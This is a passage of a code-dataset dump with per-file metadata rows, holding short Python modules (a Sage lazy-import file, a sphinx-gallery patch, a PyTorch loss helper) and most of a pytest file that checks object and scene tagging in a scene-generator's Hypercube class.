d8822036a9843bd4d75845024072515ede56bcb9
|
[
"BSL-1.0"
] | 2
|
2018-06-30T01:37:35.000Z
|
2018-06-30T01:37:39.000Z
|
src/sage/manifolds/all.py
|
boothby/sage
|
1b1e6f608d1ef8ee664bb19e991efbbc68cbd51f
|
[
"BSL-1.0"
] | null | null | null |
src/sage/manifolds/all.py
|
boothby/sage
|
1b1e6f608d1ef8ee664bb19e991efbbc68cbd51f
|
[
"BSL-1.0"
] | null | null | null |
from sage.misc.lazy_import import lazy_import
lazy_import('sage.manifolds.manifold', 'Manifold')
lazy_import('sage.manifolds.utilities', 'set_axes_labels')
| 39
| 58
| 0.820513
| 22
| 156
| 5.545455
| 0.5
| 0.327869
| 0.262295
| 0.377049
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.051282
| 156
| 3
| 59
| 52
| 0.824324
| 0
| 0
| 0
| 0
| 0
| 0.448718
| 0.301282
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
881c6d54ec83dc2c3ca727770b3197668296da91
| 168
|
py
|
Python
|
docs/source/_patch/_sphinx_gallery_patch.py
|
bomtuckle/pyrolite
|
c0af0ade14ff26b4e9fdd5a033b27e73df085c55
|
[
"BSD-3-Clause"
] | 69
|
2019-02-25T00:17:53.000Z
|
2022-03-31T17:26:48.000Z
|
docs/source/_patch/_sphinx_gallery_patch.py
|
bomtuckle/pyrolite
|
c0af0ade14ff26b4e9fdd5a033b27e73df085c55
|
[
"BSD-3-Clause"
] | 68
|
2018-07-20T09:01:01.000Z
|
2022-03-31T16:28:36.000Z
|
docs/source/_patch/_sphinx_gallery_patch.py
|
bomtuckle/pyrolite
|
c0af0ade14ff26b4e9fdd5a033b27e73df085c55
|
[
"BSD-3-Clause"
] | 24
|
2018-10-02T04:32:10.000Z
|
2021-11-10T08:24:17.000Z
|
from .sphinx_gallery_binder import alt_gen_binder_rst
from .sphinx_gallery_gen_rst import _save_rst_example
from .sphinx_gallery_scrapers import alt_matplotlib_scraper
| 42
| 59
| 0.910714
| 26
| 168
| 5.307692
| 0.5
| 0.217391
| 0.369565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 168
| 3
| 60
| 56
| 0.884615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
88253588293386909abce282eac538db36349cdb
| 134
|
py
|
Python
|
step3_train_model/pytorch/model/loss.py
|
weir12/DENA
|
0653826b4853264af75f7400e309e9e840f085c0
|
[
"MIT"
] | 12
|
2021-08-21T07:45:46.000Z
|
2022-03-12T03:12:49.000Z
|
step3_train_model/pytorch/model/loss.py
|
q1134269149/DENA
|
c3cc7e897dd12143ddb06536e3d371f7fcaf3ded
|
[
"Apache-2.0"
] | 7
|
2022-01-21T16:18:40.000Z
|
2022-03-31T06:43:28.000Z
|
step3_train_model/pytorch/model/loss.py
|
q1134269149/DENA
|
c3cc7e897dd12143ddb06536e3d371f7fcaf3ded
|
[
"Apache-2.0"
] | 5
|
2021-08-25T05:07:21.000Z
|
2022-02-02T09:31:46.000Z
|
import torch.nn.functional as F
import torch.nn as nn
def CE_loss(output, target):
return nn.CrossEntropyLoss()(output, target)
| 19.142857
| 48
| 0.753731
| 21
| 134
| 4.761905
| 0.619048
| 0.22
| 0.26
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149254
| 134
| 6
| 49
| 22.333333
| 0.877193
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
88445bd71223a8b9d623a163be5be813237710b9
| 59,372
|
py
|
Python
|
tests/hypercubes_test.py
|
NextCenturyCorporation/mcs-scene-generator
|
e0a6ee778359cadd2de682a5006581b7a6134431
|
[
"Apache-2.0"
] | 4
|
2021-02-04T03:57:52.000Z
|
2022-02-08T18:19:58.000Z
|
tests/hypercubes_test.py
|
NextCenturyCorporation/mcs-scene-generator
|
e0a6ee778359cadd2de682a5006581b7a6134431
|
[
"Apache-2.0"
] | 68
|
2021-05-06T08:52:46.000Z
|
2022-03-23T16:46:03.000Z
|
tests/hypercubes_test.py
|
NextCenturyCorporation/mcs-scene-generator
|
e0a6ee778359cadd2de682a5006581b7a6134431
|
[
"Apache-2.0"
] | 1
|
2021-02-04T03:21:57.000Z
|
2021-02-04T03:21:57.000Z
|
import copy
from hypercube import Hypercube
from hypercube.hypercubes import update_floor_and_walls, update_scene_objects
class MockHypercube(Hypercube):
def __init__(self):
super().__init__('mock', {}, {
'category': 'mock',
'domainsInfo': {},
'sceneInfo': {'all': []}
})
def _create_scenes(self, body_template, goal_template):
return [{**body_template, **{'goal': goal_template}}]
def _get_training_scenes(self):
return self._scenes
def create_tags_test_object_1():
return {
'id': 'test_sphere',
'type': 'sphere',
'mass': 0.5,
'materials': ['test_material'],
'moveable': True,
'pickupable': True,
'salientMaterials': ['plastic'],
'debug': {
'dimensions': {
'x': 0.1,
'y': 0.1,
'z': 0.1
},
'info': ['tiny', 'light', 'blue', 'plastic', 'ball'],
'goalString': 'tiny light blue plastic ball',
'materialCategory': ['plastic'],
'untrainedCategory': False,
'untrainedColor': False,
'untrainedCombination': False,
'untrainedShape': False,
'untrainedSize': False
},
'shows': [{
'stepBegin': 0,
'position': {
'x': 0,
'y': 0,
'z': 0
}
}]
}
def create_tags_test_object_2():
return {
'id': 'test_cube',
'type': 'cube',
'mass': 2.5,
'materials': ['test_material'],
'moveable': True,
'pickupable': True,
'salientMaterials': ['plastic'],
'debug': {
'dimensions': {
'x': 0.5,
'y': 0.5,
'z': 0.5
},
'info': ['medium', 'light', 'yellow', 'plastic', 'cube'],
'goalString': 'medium light yellow plastic cube',
'materialCategory': ['plastic'],
'untrainedCategory': False,
'untrainedColor': False,
'untrainedCombination': False,
'untrainedShape': False,
'untrainedSize': False
},
'shows': [{
'stepBegin': 0,
'position': {
'x': 1,
'y': 2,
'z': 3
}
}]
}
def test_Hypercube_create_scenes_on_init():
hypercube = MockHypercube()
assert len(hypercube._scenes) == 1
def test_Hypercube_init_scenes():
hypercube = MockHypercube()
scene = hypercube.get_scenes()[0]
assert 'category' in scene['goal']
assert 'domainsInfo' in scene['goal']
assert 'objectsInfo' in scene['goal']
assert 'sceneInfo' in scene['goal']
def test_Hypercube_tags():
hypercube = MockHypercube()
target = create_tags_test_object_1()
scene = hypercube.get_scenes()[0]
print(f'{scene}')
scene = update_scene_objects(scene, {'target': [target]})
assert set(scene['goal']['objectsInfo']['all']) == {
'target',
'tiny', 'light', 'blue', 'plastic', 'ball',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'uncontained'
}
assert set(scene['goal']['objectsInfo']['target']) == {
'tiny', 'light', 'blue', 'plastic', 'ball',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'uncontained'
}
assert not scene['goal']['sceneInfo']['contained']['target']
assert not scene['goal']['sceneInfo']['untrainedCategory']['target']
assert not scene['goal']['sceneInfo']['untrainedColor']['target']
assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
assert not scene['goal']['sceneInfo']['untrainedShape']['target']
assert not scene['goal']['sceneInfo']['untrainedSize']['target']
assert scene['goal']['sceneInfo']['present']['target']
assert scene['goal']['sceneInfo']['trainedCategory']['target']
assert scene['goal']['sceneInfo']['trainedColor']['target']
assert scene['goal']['sceneInfo']['trainedCombination']['target']
assert scene['goal']['sceneInfo']['trainedShape']['target']
assert scene['goal']['sceneInfo']['trainedSize']['target']
assert scene['goal']['sceneInfo']['uncontained']['target']
assert scene['goal']['sceneInfo']['count']['all'] == 1
assert scene['goal']['sceneInfo']['count']['target'] == 1
def test_Hypercube_tags_multiple_target():
hypercube = MockHypercube()
target_1 = create_tags_test_object_1()
target_2 = create_tags_test_object_2()
scene = hypercube.get_scenes()[0]
print(f'{scene}')
scene = update_scene_objects(
scene,
{'target': [target_1, target_2]}
)
assert set(scene['goal']['objectsInfo']['all']) == {
'target',
'tiny', 'light', 'blue', 'plastic', 'ball',
'medium', 'light', 'yellow', 'plastic', 'cube',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'uncontained'
}
assert set(scene['goal']['objectsInfo']['target']) == {
'tiny', 'light', 'blue', 'plastic', 'ball',
'medium', 'light', 'yellow', 'plastic', 'cube',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'uncontained'
}
assert not scene['goal']['sceneInfo']['contained']['target']
assert not scene['goal']['sceneInfo']['untrainedCategory']['target']
assert not scene['goal']['sceneInfo']['untrainedColor']['target']
assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
assert not scene['goal']['sceneInfo']['untrainedShape']['target']
assert not scene['goal']['sceneInfo']['untrainedSize']['target']
assert scene['goal']['sceneInfo']['present']['target']
assert scene['goal']['sceneInfo']['trainedCategory']['target']
assert scene['goal']['sceneInfo']['trainedColor']['target']
assert scene['goal']['sceneInfo']['trainedCombination']['target']
assert scene['goal']['sceneInfo']['trainedShape']['target']
assert scene['goal']['sceneInfo']['trainedSize']['target']
assert scene['goal']['sceneInfo']['uncontained']['target']
assert scene['goal']['sceneInfo']['count']['all'] == 2
assert scene['goal']['sceneInfo']['count']['target'] == 2
def test_Hypercube_tags_with_obstacle():
hypercube = MockHypercube()
target = create_tags_test_object_1()
obstacle = create_tags_test_object_2()
scene = hypercube.get_scenes()[0]
print(f'{scene}')
scene = update_scene_objects(
scene,
{'target': [target], 'obstacle': [obstacle]}
)
assert set(scene['goal']['objectsInfo']['all']) == {
'target', 'obstacle',
'tiny', 'light', 'blue', 'plastic', 'ball',
'medium', 'light', 'yellow', 'plastic', 'cube',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'uncontained'
}
assert set(scene['goal']['objectsInfo']['obstacle']) == {
'medium', 'light', 'yellow', 'plastic', 'cube',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'uncontained'
}
assert set(scene['goal']['objectsInfo']['target']) == {
'tiny', 'light', 'blue', 'plastic', 'ball',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'uncontained'
}
assert not scene['goal']['sceneInfo']['contained']['obstacle']
assert not scene['goal']['sceneInfo']['contained']['target']
assert not scene['goal']['sceneInfo']['untrainedCategory']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedCategory']['target']
assert not scene['goal']['sceneInfo']['untrainedColor']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedColor']['target']
assert not scene['goal']['sceneInfo']['untrainedCombination']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
assert not scene['goal']['sceneInfo']['untrainedShape']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedShape']['target']
assert not scene['goal']['sceneInfo']['untrainedSize']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedSize']['target']
assert scene['goal']['sceneInfo']['present']['obstacle']
assert scene['goal']['sceneInfo']['present']['target']
assert scene['goal']['sceneInfo']['trainedCategory']['obstacle']
assert scene['goal']['sceneInfo']['trainedCategory']['target']
assert scene['goal']['sceneInfo']['trainedColor']['obstacle']
assert scene['goal']['sceneInfo']['trainedColor']['target']
assert scene['goal']['sceneInfo']['trainedCombination']['obstacle']
assert scene['goal']['sceneInfo']['trainedCombination']['target']
assert scene['goal']['sceneInfo']['trainedShape']['obstacle']
assert scene['goal']['sceneInfo']['trainedShape']['target']
assert scene['goal']['sceneInfo']['trainedSize']['obstacle']
assert scene['goal']['sceneInfo']['trainedSize']['target']
assert scene['goal']['sceneInfo']['uncontained']['obstacle']
assert scene['goal']['sceneInfo']['uncontained']['target']
assert scene['goal']['sceneInfo']['count']['all'] == 2
assert scene['goal']['sceneInfo']['count']['obstacle'] == 1
assert scene['goal']['sceneInfo']['count']['target'] == 1
def test_Hypercube_tags_multiple_target_multiple_obstacle():
hypercube = MockHypercube()
target_1 = create_tags_test_object_1()
target_2 = create_tags_test_object_1()
obstacle_1 = create_tags_test_object_2()
obstacle_2 = create_tags_test_object_2()
scene = hypercube.get_scenes()[0]
print(f'{scene}')
scene = update_scene_objects(
scene,
{
'target': [target_1, target_2],
'obstacle': [obstacle_1, obstacle_2]
}
)
assert set(scene['goal']['objectsInfo']['all']) == {
'target', 'obstacle',
'tiny', 'light', 'blue', 'plastic', 'ball',
'medium', 'light', 'yellow', 'plastic', 'cube',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'uncontained'
}
assert set(scene['goal']['objectsInfo']['obstacle']) == {
'medium', 'light', 'yellow', 'plastic', 'cube',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'uncontained'
}
assert set(scene['goal']['objectsInfo']['target']) == {
'tiny', 'light', 'blue', 'plastic', 'ball',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'uncontained'
}
assert not scene['goal']['sceneInfo']['contained']['obstacle']
assert not scene['goal']['sceneInfo']['contained']['target']
assert not scene['goal']['sceneInfo']['untrainedCategory']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedCategory']['target']
assert not scene['goal']['sceneInfo']['untrainedColor']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedColor']['target']
assert not scene['goal']['sceneInfo']['untrainedCombination']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
assert not scene['goal']['sceneInfo']['untrainedShape']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedShape']['target']
assert not scene['goal']['sceneInfo']['untrainedSize']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedSize']['target']
assert scene['goal']['sceneInfo']['present']['obstacle']
assert scene['goal']['sceneInfo']['present']['target']
assert scene['goal']['sceneInfo']['trainedCategory']['obstacle']
assert scene['goal']['sceneInfo']['trainedCategory']['target']
assert scene['goal']['sceneInfo']['trainedColor']['obstacle']
assert scene['goal']['sceneInfo']['trainedColor']['target']
assert scene['goal']['sceneInfo']['trainedCombination']['obstacle']
assert scene['goal']['sceneInfo']['trainedCombination']['target']
assert scene['goal']['sceneInfo']['trainedShape']['obstacle']
assert scene['goal']['sceneInfo']['trainedShape']['target']
assert scene['goal']['sceneInfo']['trainedSize']['obstacle']
assert scene['goal']['sceneInfo']['trainedSize']['target']
assert scene['goal']['sceneInfo']['uncontained']['obstacle']
assert scene['goal']['sceneInfo']['uncontained']['target']
assert scene['goal']['sceneInfo']['count']['all'] == 4
assert scene['goal']['sceneInfo']['count']['obstacle'] == 2
assert scene['goal']['sceneInfo']['count']['target'] == 2
def test_Hypercube_tags_with_intuitive_physics_occluder():
hypercube = MockHypercube()
target = create_tags_test_object_1()
occluder_wall = {'debug': {'info': ['white']}}
occluder_pole = {'debug': {'info': ['brown']}}
occluder_tag = 'intuitive_physics_occluder'
scene = hypercube.get_scenes()[0]
print(f'{scene}')
scene = update_scene_objects(
scene,
{
'target': [target],
'intuitive physics occluder': [occluder_wall, occluder_pole]
}
)
assert set(scene['goal']['objectsInfo']['all']) == {
'target', 'intuitive physics occluder',
'tiny', 'light', 'blue', 'plastic', 'ball',
'white', 'brown',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'uncontained'
}
assert set(scene['goal']['objectsInfo'][occluder_tag]) == {
'white', 'brown'
}
assert set(scene['goal']['objectsInfo']['target']) == {
'tiny', 'light', 'blue', 'plastic', 'ball',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'uncontained'
}
assert not scene['goal']['sceneInfo']['contained'][occluder_tag]
assert not scene['goal']['sceneInfo']['contained']['target']
assert not scene['goal']['sceneInfo']['untrainedCategory'][occluder_tag]
assert not scene['goal']['sceneInfo']['untrainedCategory']['target']
assert not scene['goal']['sceneInfo']['untrainedColor'][occluder_tag]
assert not scene['goal']['sceneInfo']['untrainedColor']['target']
assert not scene['goal']['sceneInfo']['untrainedCombination'][occluder_tag]
assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
assert not scene['goal']['sceneInfo']['untrainedShape'][occluder_tag]
assert not scene['goal']['sceneInfo']['untrainedShape']['target']
assert not scene['goal']['sceneInfo']['untrainedSize'][occluder_tag]
assert not scene['goal']['sceneInfo']['untrainedSize']['target']
assert scene['goal']['sceneInfo']['trainedCategory']['target']
assert scene['goal']['sceneInfo']['trainedColor']['target']
assert scene['goal']['sceneInfo']['trainedCombination']['target']
assert scene['goal']['sceneInfo']['trainedShape']['target']
assert scene['goal']['sceneInfo']['trainedSize']['target']
assert scene['goal']['sceneInfo']['count']['all'] == 2
assert scene['goal']['sceneInfo']['count'][occluder_tag] == 1
assert scene['goal']['sceneInfo']['count']['target'] == 1
assert scene['goal']['sceneInfo']['present'][occluder_tag]
assert scene['goal']['sceneInfo']['present']['target']
assert scene['goal']['sceneInfo']['uncontained']['target']
def test_Hypercube_tags_target_enclosed():
hypercube = MockHypercube()
target = create_tags_test_object_1()
target['locationParent'] = 'parent'
scene = hypercube.get_scenes()[0]
print(f'{scene}')
scene = update_scene_objects(scene, {'target': [target]})
assert set(scene['goal']['objectsInfo']['all']) == {
'target',
'tiny', 'light', 'blue', 'plastic', 'ball',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'contained'
}
assert set(scene['goal']['objectsInfo']['target']) == {
'tiny', 'light', 'blue', 'plastic', 'ball',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'contained'
}
assert not scene['goal']['sceneInfo']['uncontained']['target']
assert not scene['goal']['sceneInfo']['untrainedCategory']['target']
assert not scene['goal']['sceneInfo']['untrainedColor']['target']
assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
assert not scene['goal']['sceneInfo']['untrainedShape']['target']
assert not scene['goal']['sceneInfo']['untrainedSize']['target']
assert scene['goal']['sceneInfo']['contained']['target']
assert scene['goal']['sceneInfo']['present']['target']
assert scene['goal']['sceneInfo']['trainedCategory']['target']
assert scene['goal']['sceneInfo']['trainedColor']['target']
assert scene['goal']['sceneInfo']['trainedCombination']['target']
assert scene['goal']['sceneInfo']['trainedShape']['target']
assert scene['goal']['sceneInfo']['trainedSize']['target']
assert scene['goal']['sceneInfo']['count']['all'] == 1
assert scene['goal']['sceneInfo']['count']['target'] == 1
def test_Hypercube_tags_target_untrained_category():
hypercube = MockHypercube()
target = create_tags_test_object_1()
target['debug']['untrainedCategory'] = True
scene = hypercube.get_scenes()[0]
print(f'{scene}')
scene = update_scene_objects(scene, {'target': [target]})
assert set(scene['goal']['objectsInfo']['all']) == {
'target',
'tiny', 'light', 'blue', 'plastic', 'ball',
'untrained category', 'trained color', 'trained shape', 'trained size',
'uncontained', 'trained combination'
}
assert set(scene['goal']['objectsInfo']['target']) == {
'tiny', 'light', 'blue', 'plastic', 'ball',
'untrained category', 'trained color', 'trained shape', 'trained size',
'uncontained', 'trained combination'
}
assert not scene['goal']['sceneInfo']['contained']['target']
assert not scene['goal']['sceneInfo']['trainedCategory']['target']
assert not scene['goal']['sceneInfo']['untrainedColor']['target']
assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
assert not scene['goal']['sceneInfo']['untrainedShape']['target']
assert not scene['goal']['sceneInfo']['untrainedSize']['target']
assert scene['goal']['sceneInfo']['present']['target']
assert scene['goal']['sceneInfo']['trainedColor']['target']
assert scene['goal']['sceneInfo']['trainedCombination']['target']
assert scene['goal']['sceneInfo']['trainedShape']['target']
assert scene['goal']['sceneInfo']['trainedSize']['target']
assert scene['goal']['sceneInfo']['uncontained']['target']
assert scene['goal']['sceneInfo']['untrainedCategory']['target']
assert scene['goal']['sceneInfo']['count']['all'] == 1
assert scene['goal']['sceneInfo']['count']['target'] == 1
def test_Hypercube_tags_target_untrained_color():
hypercube = MockHypercube()
target = create_tags_test_object_1()
target['debug']['untrainedColor'] = True
scene = hypercube.get_scenes()[0]
print(f'{scene}')
scene = update_scene_objects(scene, {'target': [target]})
assert set(scene['goal']['objectsInfo']['all']) == {
'target',
'tiny', 'light', 'blue', 'plastic', 'ball',
'trained category', 'untrained color', 'trained shape', 'trained size',
'uncontained', 'trained combination'
}
assert set(scene['goal']['objectsInfo']['target']) == {
'tiny', 'light', 'blue', 'plastic', 'ball',
'trained category', 'untrained color', 'trained shape', 'trained size',
'uncontained', 'trained combination'
}
assert not scene['goal']['sceneInfo']['contained']['target']
assert not scene['goal']['sceneInfo']['trainedColor']['target']
assert not scene['goal']['sceneInfo']['untrainedCategory']['target']
assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
assert not scene['goal']['sceneInfo']['untrainedShape']['target']
assert not scene['goal']['sceneInfo']['untrainedSize']['target']
assert scene['goal']['sceneInfo']['present']['target']
assert scene['goal']['sceneInfo']['trainedCategory']['target']
assert scene['goal']['sceneInfo']['trainedCombination']['target']
assert scene['goal']['sceneInfo']['trainedShape']['target']
assert scene['goal']['sceneInfo']['trainedSize']['target']
assert scene['goal']['sceneInfo']['uncontained']['target']
assert scene['goal']['sceneInfo']['untrainedColor']['target']
assert scene['goal']['sceneInfo']['count']['all'] == 1
assert scene['goal']['sceneInfo']['count']['target'] == 1
def test_Hypercube_tags_target_untrained_combination():
hypercube = MockHypercube()
target = create_tags_test_object_1()
target['debug']['untrainedCombination'] = True
scene = hypercube.get_scenes()[0]
print(f'{scene}')
scene = update_scene_objects(scene, {'target': [target]})
assert set(scene['goal']['objectsInfo']['all']) == {
'target',
'tiny', 'light', 'blue', 'plastic', 'ball',
'trained category', 'trained color', 'untrained combination',
'trained shape', 'trained size', 'uncontained'
}
assert set(scene['goal']['objectsInfo']['target']) == {
'tiny', 'light', 'blue', 'plastic', 'ball',
'trained category', 'trained color', 'untrained combination',
'trained shape', 'trained size', 'uncontained'
}
assert not scene['goal']['sceneInfo']['trainedCombination']['target']
assert not scene['goal']['sceneInfo']['contained']['target']
assert not scene['goal']['sceneInfo']['untrainedCategory']['target']
assert not scene['goal']['sceneInfo']['untrainedColor']['target']
assert not scene['goal']['sceneInfo']['untrainedShape']['target']
assert not scene['goal']['sceneInfo']['untrainedSize']['target']
assert scene['goal']['sceneInfo']['present']['target']
assert scene['goal']['sceneInfo']['trainedCategory']['target']
assert scene['goal']['sceneInfo']['trainedColor']['target']
assert scene['goal']['sceneInfo']['trainedShape']['target']
assert scene['goal']['sceneInfo']['trainedSize']['target']
assert scene['goal']['sceneInfo']['uncontained']['target']
assert scene['goal']['sceneInfo']['untrainedCombination']['target']
assert scene['goal']['sceneInfo']['count']['all'] == 1
assert scene['goal']['sceneInfo']['count']['target'] == 1
def test_Hypercube_tags_target_untrained_shape():
hypercube = MockHypercube()
target = create_tags_test_object_1()
target['debug']['untrainedShape'] = True
scene = hypercube.get_scenes()[0]
print(f'{scene}')
scene = update_scene_objects(scene, {'target': [target]})
assert set(scene['goal']['objectsInfo']['all']) == {
'target',
'tiny', 'light', 'blue', 'plastic', 'ball',
'trained category', 'trained color', 'untrained shape',
'trained size', 'uncontained', 'trained combination'
}
assert set(scene['goal']['objectsInfo']['target']) == {
'tiny', 'light', 'blue', 'plastic', 'ball',
'trained category', 'trained color', 'untrained shape',
'trained size', 'uncontained', 'trained combination'
}
assert not scene['goal']['sceneInfo']['contained']['target']
assert not scene['goal']['sceneInfo']['trainedShape']['target']
assert not scene['goal']['sceneInfo']['untrainedCategory']['target']
assert not scene['goal']['sceneInfo']['untrainedColor']['target']
assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
assert not scene['goal']['sceneInfo']['untrainedSize']['target']
assert scene['goal']['sceneInfo']['present']['target']
assert scene['goal']['sceneInfo']['trainedCategory']['target']
assert scene['goal']['sceneInfo']['trainedColor']['target']
assert scene['goal']['sceneInfo']['trainedCombination']['target']
assert scene['goal']['sceneInfo']['trainedSize']['target']
assert scene['goal']['sceneInfo']['uncontained']['target']
assert scene['goal']['sceneInfo']['untrainedShape']['target']
assert scene['goal']['sceneInfo']['count']['all'] == 1
assert scene['goal']['sceneInfo']['count']['target'] == 1
def test_Hypercube_tags_target_untrained_size():
hypercube = MockHypercube()
target = create_tags_test_object_1()
target['debug']['untrainedSize'] = True
scene = hypercube.get_scenes()[0]
print(f'{scene}')
scene = update_scene_objects(scene, {'target': [target]})
assert set(scene['goal']['objectsInfo']['all']) == {
'target',
'tiny', 'light', 'blue', 'plastic', 'ball',
'trained category', 'trained color', 'trained combination',
'trained shape', 'untrained size', 'uncontained'
}
assert set(scene['goal']['objectsInfo']['target']) == {
'tiny', 'light', 'blue', 'plastic', 'ball',
'trained category', 'trained color', 'trained combination',
'trained shape', 'untrained size', 'uncontained'
}
assert not scene['goal']['sceneInfo']['contained']['target']
assert not scene['goal']['sceneInfo']['trainedSize']['target']
assert not scene['goal']['sceneInfo']['untrainedCategory']['target']
assert not scene['goal']['sceneInfo']['untrainedColor']['target']
assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
assert not scene['goal']['sceneInfo']['untrainedShape']['target']
assert scene['goal']['sceneInfo']['present']['target']
assert scene['goal']['sceneInfo']['trainedCategory']['target']
assert scene['goal']['sceneInfo']['trainedColor']['target']
assert scene['goal']['sceneInfo']['trainedCombination']['target']
assert scene['goal']['sceneInfo']['trainedShape']['target']
assert scene['goal']['sceneInfo']['uncontained']['target']
assert scene['goal']['sceneInfo']['untrainedSize']['target']
assert scene['goal']['sceneInfo']['count']['all'] == 1
assert scene['goal']['sceneInfo']['count']['target'] == 1
def test_Hypercube_tags_target_enclosed_untrained_everything():
hypercube = MockHypercube()
target = create_tags_test_object_1()
target['locationParent'] = 'parent'
target['debug']['untrainedCategory'] = True
target['debug']['untrainedColor'] = True
target['debug']['untrainedShape'] = True
target['debug']['untrainedSize'] = True
scene = hypercube.get_scenes()[0]
print(f'{scene}')
scene = update_scene_objects(scene, {'target': [target]})
assert set(scene['goal']['objectsInfo']['all']) == {
'target',
'tiny', 'light', 'blue', 'plastic', 'ball',
'untrained category', 'untrained color', 'untrained shape',
'untrained size', 'contained', 'trained combination'
}
assert set(scene['goal']['objectsInfo']['target']) == {
'tiny', 'light', 'blue', 'plastic', 'ball',
'untrained category', 'untrained color', 'untrained shape',
'untrained size', 'contained', 'trained combination'
}
assert not scene['goal']['sceneInfo']['trainedCategory']['target']
assert not scene['goal']['sceneInfo']['trainedColor']['target']
assert not scene['goal']['sceneInfo']['trainedShape']['target']
assert not scene['goal']['sceneInfo']['trainedSize']['target']
assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
assert not scene['goal']['sceneInfo']['uncontained']['target']
assert scene['goal']['sceneInfo']['contained']['target']
assert scene['goal']['sceneInfo']['present']['target']
assert scene['goal']['sceneInfo']['trainedCombination']['target']
assert scene['goal']['sceneInfo']['untrainedCategory']['target']
assert scene['goal']['sceneInfo']['untrainedColor']['target']
assert scene['goal']['sceneInfo']['untrainedShape']['target']
assert scene['goal']['sceneInfo']['untrainedSize']['target']
assert scene['goal']['sceneInfo']['count']['all'] == 1
assert scene['goal']['sceneInfo']['count']['target'] == 1
def test_Hypercube_tags_obstacle_enclosed():
hypercube = MockHypercube()
target = create_tags_test_object_1()
obstacle = create_tags_test_object_2()
obstacle['locationParent'] = 'parent'
scene = hypercube.get_scenes()[0]
print(f'{scene}')
scene = update_scene_objects(
scene,
{'target': [target], 'obstacle': [obstacle]}
)
assert set(scene['goal']['objectsInfo']['all']) == {
'target', 'obstacle',
'tiny', 'light', 'blue', 'plastic', 'ball',
'medium', 'light', 'yellow', 'plastic', 'cube',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'contained', 'uncontained'
}
assert set(scene['goal']['objectsInfo']['obstacle']) == {
'medium', 'light', 'yellow', 'plastic', 'cube',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'contained'
}
assert set(scene['goal']['objectsInfo']['target']) == {
'tiny', 'light', 'blue', 'plastic', 'ball',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'uncontained'
}
assert not scene['goal']['sceneInfo']['contained']['target']
assert not scene['goal']['sceneInfo']['uncontained']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedCategory']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedCategory']['target']
assert not scene['goal']['sceneInfo']['untrainedColor']['target']
assert not scene['goal']['sceneInfo']['untrainedColor']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedColor']['target']
assert not scene['goal']['sceneInfo']['untrainedCombination']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
assert not scene['goal']['sceneInfo']['untrainedShape']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedShape']['target']
assert not scene['goal']['sceneInfo']['untrainedSize']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedSize']['target']
assert scene['goal']['sceneInfo']['contained']['obstacle']
